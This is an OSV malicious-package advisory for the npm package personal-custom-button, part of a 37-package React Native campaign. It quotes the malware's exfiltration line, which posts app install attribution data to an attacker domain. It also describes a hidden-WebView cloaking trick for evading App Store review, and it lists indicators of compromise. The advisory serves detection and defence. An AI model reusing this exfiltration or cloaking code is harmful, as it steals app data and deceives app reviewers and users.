MAL-2026-6171

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/personal-custom-button/MAL-2026-6171.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6171
Published
2026-06-17T12:00:00Z
Modified
2026-06-19T01:16:47.453136033Z
Summary
Malicious code in personal-custom-button (npm)
Details

The npm package personal-custom-button (published by npm user sproger, slavatopbuyer@gmail.com) is a deceptive React Native component and part of a coordinated 37-package campaign spanning two attacker-controlled domains (surrprisingcoompanny.lol and barbellmate.xyz).

On component mount it registers an appsFlyer.onInstallConversionData callback and exfiltrates the app's install/conversion attribution data via axios.post("https://surrprisingcoompanny.lol", data). It then fetches a remote-config URL and renders it full-screen in a react-native-webview that stays hidden (display:'none') unless the server returns a valid URL, i.e. App Store review evasion / attribution laundering ('cloaking'). The package name is a decoy unrelated to the component's actual function, and the real logic is concealed behind junk 'calculator' functions with Ukrainian-language comments.

Indicators of compromise: C2 domains surrprisingcoompanny.lol and barbellmate.xyz; npm author sproger. Both C2 domains are currently unregistered, which is a dangling-C2 takeover risk for any app still shipping these packages.

Reproducible from the published tarball, e.g. socket-network@1.0.0 SocketComponent*.jsx: appsFlyer.onInstallConversionData(...) -> axios.post("https://surrprisingcoompanny.lol", data); axios.get(fLink) for the remote config; hidden <WebView source={{uri: techResult}}> gated on display:'none'/'flex'.

Database specific
{
    "malicious-packages-origins": null,
    "iocs": {
        "domains": [
            "surrprisingcoompanny.lol",
            "barbellmate.xyz"
        ]
    }
}
References
Credits

Affected packages

npm / personal-custom-button

Package

Name
personal-custom-button
Purl
pkg:npm/personal-custom-button

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)

Affected versions

1.*
1.0.0
1.0.1
1.0.2
1.0.3
1.0.4
1.0.5
1.0.6

Database specific

cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/personal-custom-button/MAL-2026-6171.json"